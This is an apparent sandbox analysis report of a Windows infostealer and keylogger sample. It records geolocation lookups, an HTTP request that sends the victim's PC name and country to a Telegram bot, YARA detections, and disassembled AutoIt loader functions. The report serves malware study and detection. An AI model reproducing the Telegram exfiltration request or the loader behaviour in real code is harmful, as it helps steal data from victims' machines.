2025-01-10 21:13:44 UTC	857	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:13:44 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1858414 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZD8gL426egUc3bnQMS4ixPqhXIliElskB2%2FcsLy6WcCkArwJXU417hyr6yoJopu9q63QXSFrsV6n5pu6HRNHm2CgvjimTw3B0XsB5%2B%2FCfUc4q7dxfj3a6NXICTiJvB1mMvXyxKg%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fffac37afa0c443-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1673&min_rtt=1667&rtt_var=637&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1700640&cwnd=244&unsent_bytes=0&cid=ef256ec3803e54f4&ts=158&x=0"
2025-01-10 21:13:44 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49721	104.21.80.1	443	6012	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:13:45 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 21:13:46 UTC	859	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:13:45 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1858415 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IedbdrN8pOALNAi9raOEcb%2FE37zhg4FxrHiL96YmqyuPuhom5uaH9JysKnumV7iIZ8gOg3NqLgRPLy%2BE1pGcvLs%2BQKn3e3OmZq9zAPH6mX7gO9Vn9cN4z%2B%2BTcUeFegsz3jgSF4kv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fffac3e68c7c443-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1691&min_rtt=1663&rtt_var=680&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1546610&cwnd=244&unsent_bytes=0&cid=84c19c0da848f60c&ts=146&x=0"
2025-01-10 21:13:46 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	49723	149.154.167.220	443	6012	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:13:46 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2011/01/2025%20/%2002:29:40%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-10 21:13:46 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:13:46 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:13:46 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Target ID:	0
Start time:	16:13:29
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\lsc5QN46NH.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\lsc5QN46NH.exe"
Imagebase:	0x600000
File size:	80'740'352 bytes
MD5 hash:	7A6425553456C5F24BB5C8E235574C72
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.1516446502.00000000021A0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	16:13:32
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\lsc5QN46NH.exe"
Imagebase:	0xda0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.3932473791.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3936515105.00000000063C3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.3934335927.0000000005341000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	3.8%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	7.7%
Total number of Nodes:	2000
Total number of Limit Nodes:	185

Executed Functions

Function 00603B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00603B68
IsDebuggerPresent.KERNEL32 ref: 00603B7A
GetFullPathNameW.KERNEL32(00007FFF,?,?,006C52F8,006C52E0,?,?), ref: 00603BEB

Part of subcall function 00607BCC: _memmove.LIBCMT ref: 00607C06

Part of subcall function 0061092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00603C14,006C52F8,?,?,?), ref: 0061096E

SetCurrentDirectoryW.KERNEL32(?), ref: 00603C6F
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,006B7770,00000010), ref: 0063D281
SetCurrentDirectoryW.KERNEL32(?,006C52F8,?,?,?), ref: 0063D2B9
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,006B4260,006C52F8,?,?,?), ref: 0063D33F
ShellExecuteW.SHELL32(00000000,?,?), ref: 0063D346

Part of subcall function 00603A46: GetSysColorBrush.USER32(0000000F), ref: 00603A50
Part of subcall function 00603A46: LoadCursorW.USER32(00000000,00007F00), ref: 00603A5F
Part of subcall function 00603A46: LoadIconW.USER32(00000063), ref: 00603A76
Part of subcall function 00603A46: LoadIconW.USER32(000000A4), ref: 00603A88
Part of subcall function 00603A46: LoadIconW.USER32(000000A2), ref: 00603A9A
Part of subcall function 00603A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00603AC0
Part of subcall function 00603A46: RegisterClassExW.USER32(?), ref: 00603B16

Part of subcall function 006039D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00603A03
Part of subcall function 006039D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00603A24
Part of subcall function 006039D5: ShowWindow.USER32(00000000,?,?), ref: 00603A38
Part of subcall function 006039D5: ShowWindow.USER32(00000000,?,?), ref: 00603A41

Part of subcall function 0060434A: _memset.LIBCMT ref: 00604370
Part of subcall function 0060434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00604415

Strings

runas, xrefs: 0063D33A
%i, xrefs: 00603C44
This is a third-party compiled AutoIt script., xrefs: 0063D279

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas$%i
API String ID: 529118366-2620332297
Opcode ID: 3b6d1afdfb4d58384938c2a6e2e0df62b792b31e874af5ff7e141bc2f8a4431c
Instruction ID: 9423d52e782c90598a4e042ad48cdab4038c427b4b466c3a24c37d3f53aefc1f
Opcode Fuzzy Hash: 3b6d1afdfb4d58384938c2a6e2e0df62b792b31e874af5ff7e141bc2f8a4431c
Instruction Fuzzy Hash: A351D470D44108AEDB19EBB4EC05EFF7BBBEB45301F005169F412A22E1DAB46B85CB65

Function 006049A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 006049CD

Part of subcall function 00607BCC: _memmove.LIBCMT ref: 00607C06

GetCurrentProcess.KERNEL32(?,0068FAEC,00000000,00000000,?), ref: 00604A9A
IsWow64Process.KERNEL32(00000000), ref: 00604AA1
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00604AE7
FreeLibrary.KERNEL32(00000000), ref: 00604AF2
GetSystemInfo.KERNEL32(00000000), ref: 00604B23
GetSystemInfo.KERNEL32(00000000), ref: 00604B2F

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: 9cdfa3f5719b9a4e892becce5c09100c15a1965fd3b42c4df626bbec42112544
Instruction ID: cc4e8b47014636ad417594f199c78a06487727e21c7a014b1ddacd3b96b99f62
Opcode Fuzzy Hash: 9cdfa3f5719b9a4e892becce5c09100c15a1965fd3b42c4df626bbec42112544
Instruction Fuzzy Hash: A291C3719C97C0DACB35DB6894501EBBFF6AF29300F444AADD1C693B81D631B908C769

Function 00604E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00604D8E,?,?,00000000,00000000), ref: 00604E99
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00604D8E,?,?,00000000,00000000), ref: 00604EB0
LoadResource.KERNEL32(?,00000000,?,?,00604D8E,?,?,00000000,00000000,?,?,?,?,?,?,00604E2F), ref: 0063D937
SizeofResource.KERNEL32(?,00000000,?,?,00604D8E,?,?,00000000,00000000,?,?,?,?,?,?,00604E2F), ref: 0063D94C
LockResource.KERNEL32(00604D8E,?,?,00604D8E,?,?,00000000,00000000,?,?,?,?,?,?,00604E2F,00000000), ref: 0063D95F

Strings

SCRIPT, xrefs: 00604EA6

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 9ef8ac4b8ed1d905a501013a76f061d7f30d426a54424972e362770079e9f805
Instruction ID: edada8d0591d0c9e22cc69b13916664b5b501be39ee745d9b26f6dc7a038ad41
Opcode Fuzzy Hash: 9ef8ac4b8ed1d905a501013a76f061d7f30d426a54424972e362770079e9f805
Instruction Fuzzy Hash: 5B115EB5240700BFD7258BA5EC48F677BBBFBC5B11F204668F506C62A0DB61E8018760

Function 0060FCE0 Relevance: 9.8, APIs: 3, Strings: 2, Instructions: 1040COMMON

Download Yara Rule

Strings

pbl, xrefs: 006449B9
%i, xrefs: 0060FCF3

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: BuffCharUpper
String ID: pbl$%i
API String ID: 3964851224-2864806806
Opcode ID: e864b347f084b9258a16a523366f8c70b8d8f966984cc2d8ce7002bb9447c706
Instruction ID: 77235bc1cf99cc9b3a644d84831923ba0f607062e2faa5111d14084409b54cb5
Opcode Fuzzy Hash: e864b347f084b9258a16a523366f8c70b8d8f966984cc2d8ce7002bb9447c706
Instruction Fuzzy Hash: 06926C70508341DFDB24DF14C481BAAB7E2BF89304F18896DE8998B352DB75EC85CB96

Function 0060E6A0 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON

Download Yara Rule

Strings

Ddl, xrefs: 0060EAC1
Variable must be of type 'Object'., xrefs: 00643E62
Ddl, xrefs: 00643B2E
Ddl, xrefs: 0060EABA
Ddl, xrefs: 00643AF5

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID:
String ID: Ddl$Ddl$Ddl$Ddl$Variable must be of type 'Object'.
API String ID: 0-483630429
Opcode ID: 4640367e4d54c64715edc01b49d58566563348ba291eb37a33aba0612f97acdc
Instruction ID: 40c066cb337d641d3ad093182d044dd8c2fdd8f7d162787e742338158fe71351
Opcode Fuzzy Hash: 4640367e4d54c64715edc01b49d58566563348ba291eb37a33aba0612f97acdc
Instruction Fuzzy Hash: D8A28F74A40225CFCB28CF58C480AAEB7B3FF59314F248869E9159B391D776ED42CB94

Function 0066445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,0063E398), ref: 0066446A
FindFirstFileW.KERNELBASE(?,?), ref: 0066447B
FindClose.KERNEL32(00000000), ref: 0066448B

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 69d69a708167fb110e97fee61f94643e72869407344cbaad405414610d475f55
Instruction ID: f27d02f7b16f2ac984909d2ce47068ce2a7b53d4a565f99e0e2a4af7764c59bf
Opcode Fuzzy Hash: 69d69a708167fb110e97fee61f94643e72869407344cbaad405414610d475f55
Instruction Fuzzy Hash: 9CE0DF328109007B8310AB78EC1E8EA779EDE45336F200726F835C21E0EFB49E0096D6

Function 006109D0 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00610A5B
timeGetTime.WINMM ref: 00610D16
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00610E53
Sleep.KERNEL32(0000000A), ref: 00610E61
LockWindowUpdate.USER32(00000000,?,?), ref: 00610EFA
DestroyWindow.USER32 ref: 00610F06
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00610F20
Sleep.KERNEL32(0000000A,?,?), ref: 00644E83
TranslateMessage.USER32(?), ref: 00645C60
DispatchMessageW.USER32(?), ref: 00645C6E
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00645C82

Strings

pbl, xrefs: 006457B4
@GUI_WINHANDLE, xrefs: 00644F8F
pbl, xrefs: 00644F59
pbl, xrefs: 00644FAE
@TRAY_ID, xrefs: 0064578F
@GUI_CTRLHANDLE, xrefs: 00644FE4
@GUI_CTRLID, xrefs: 00644F3A
pbl, xrefs: 00645003
@COM_EVENTOBJ, xrefs: 006454F0

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pbl$pbl$pbl$pbl
API String ID: 4212290369-2343256454
Opcode ID: a369e0f3ad3c59cc39540c5a9da5cdab37a3df1b4151b4c4dc8155848b44d6c4
Instruction ID: c3dbd107c588f522dbfd9f56dacfd45784933c7a746462fecf7f3221c0f27862
Opcode Fuzzy Hash: a369e0f3ad3c59cc39540c5a9da5cdab37a3df1b4151b4c4dc8155848b44d6c4
Instruction Fuzzy Hash: AAB2A270608741DFDB28DF24C845BAAB7E7BF84304F14491DF48A972A2DB71E885CB96

Function 00669155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00668F5F: __time64.LIBCMT ref: 00668F69

Part of subcall function 00604EE5: _fseek.LIBCMT ref: 00604EFD

__wsplitpath.LIBCMT ref: 00669234

Part of subcall function 006240FB: __wsplitpath_helper.LIBCMT ref: 0062413B

_wcscpy.LIBCMT ref: 00669247
_wcscat.LIBCMT ref: 0066925A
__wsplitpath.LIBCMT ref: 0066927F
_wcscat.LIBCMT ref: 00669295
_wcscat.LIBCMT ref: 006692A8

Part of subcall function 00668FA5: _memmove.LIBCMT ref: 00668FDE
Part of subcall function 00668FA5: _memmove.LIBCMT ref: 00668FED

_wcscmp.LIBCMT ref: 006691EF

Part of subcall function 00669734: _wcscmp.LIBCMT ref: 00669824
Part of subcall function 00669734: _wcscmp.LIBCMT ref: 00669837

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00669452
_wcsncpy.LIBCMT ref: 006694C5
DeleteFileW.KERNEL32(?,?), ref: 006694FB
